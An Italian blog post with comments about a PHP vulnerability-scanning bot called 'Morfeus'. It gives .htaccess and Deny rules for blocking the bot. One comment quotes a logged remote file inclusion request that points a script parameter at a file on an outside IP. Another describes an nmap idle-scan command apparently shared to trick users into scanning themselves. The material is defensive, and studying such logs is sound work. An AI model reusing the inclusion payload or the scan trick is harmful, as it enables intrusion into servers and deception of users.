Se avete notato questo strano user agent nel log del vostro server "Morfeus Fucking Scanner", sappiate che si tratta di un bot che cerca vulnerabilità nelle applicazioni PHP.

Al momento, su questo server, il rompi scatole è made in spain. Ma scorrendo i vecchi log mi sono accorto che spesso veniva dagli Sati Uniti.

Sembra comunque non aver trovato nessuna vulnerabilità. Dato che nei log non trovo chiamate post andate a buon fine da parte del simpaticone, che accessi strani dell’IP relativo. Tutto il resto sembra funzionare regolarmente apparte qualche rallentamento, anche pesante, del server, dovuto alle continue richieste.

Se state usando Apache, potete bloccare Morfeus usando .htaccess

RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} ^Morfeus
RewriteRule ^.*$ – [F]

E tanti saluti a Morfeus ;-)

5 thoughts on “Morfeus Fucking Scanner

  1. Mi hai incuriosito :)

    primo:/var/log/apache2/primo# grep -ri Morfeus * | cut -d -f7,12-17 | sort | uniq
    /bb/jscripts/post.js "Morfeus strikes again."
    /bbs/jscripts/post.js "Morfeus strikes again."
    /chat/jscripts/post.js "Morfeus strikes again."
    /community/jscripts/post.js "Morfeus strikes again."
    /foro/jscripts/post.js "Morfeus strikes again."
    /foros/jscripts/post.js "Morfeus strikes again."
    /forum/jscripts/post.js "Morfeus strikes again."
    /forums/jscripts/post.js "Morfeus strikes again."
    /jscripts/post.js "Morfeus strikes again."
    /mybb/jscripts/post.js "Morfeus strikes again."
    /myBB/jscripts/post.js "Morfeus strikes again."
    /MyBB/jscripts/post.js "Morfeus strikes again."
    /phgstats/index.php?phgdir=http://80.34.102.151/joomla/1.gif?/ "Morfeus Fucking Scanner"
    /phorum/jscripts/post.js "Morfeus strikes again."

    Sono troppo avanti: Tu hai Morfeus Fucking Scanner, io ho gia' Morfeus strikes again :D !!

    Mi ricordo che ai tempi di codered, avevo usato una rule simile alla tua, ma rimandavo il traffico su … 127.0.0.1 :P !

  2. @Giambo

    Che strano : qualche settimana fa , nel canale ubuntu-it un tizio si lamentava del fatto che nmap non funzionava e postava relativa riga di comando ; l'aveva anche postata sul forum di ubuntu ; sono quasi stato tentato di provare con il classico copia incolla, ma con programmi come nmap bisogna sempre andarci un po' cauti : in effetti il tizio aveva programmato un Idle Scan in cui l'Ip zombie apparteneva allo stesso range di IP che compare nei tuoi log …

    Mi sono fatto l'idea che il tizio avesse fatto una (maldestra) operazione di social engeneering , anche perchè aveva sostituito l'IP da scansionare con una pseudo variabile nominata $MIO-IP , confidando probabilmente nel fatto che i malcapitati sostituissero quel campo con il proprio IP. Nelle pagine del manuale di nmap mi sembra di aver letto che una scansione di questo tipo non restituisce alcun risultato , poichè tutto viene spedito all'IP zombie ; ma se a quell'IP c'è qualcosa che ascolta , il risultato della scansione giunge lì … XD

    Non ricordo il nick usato in Irc , nè quello sul forum …ma il range si e non mi chiedere perchè XD

    Quando ho realizzato le sue intenzioni , mi sono limitato a dirgli che c'aveva provato XD

    Ok ok … ho esagerato e probabilmente avrò preso un abbaglio formato gigante XD

  3. scanners ip: 196.15.143.142

    solution:

    add "Deny from 196.15.143.142" in root dir section of apache cfg file. (this way u don't need to edid htacces in every directory)

Comments are closed.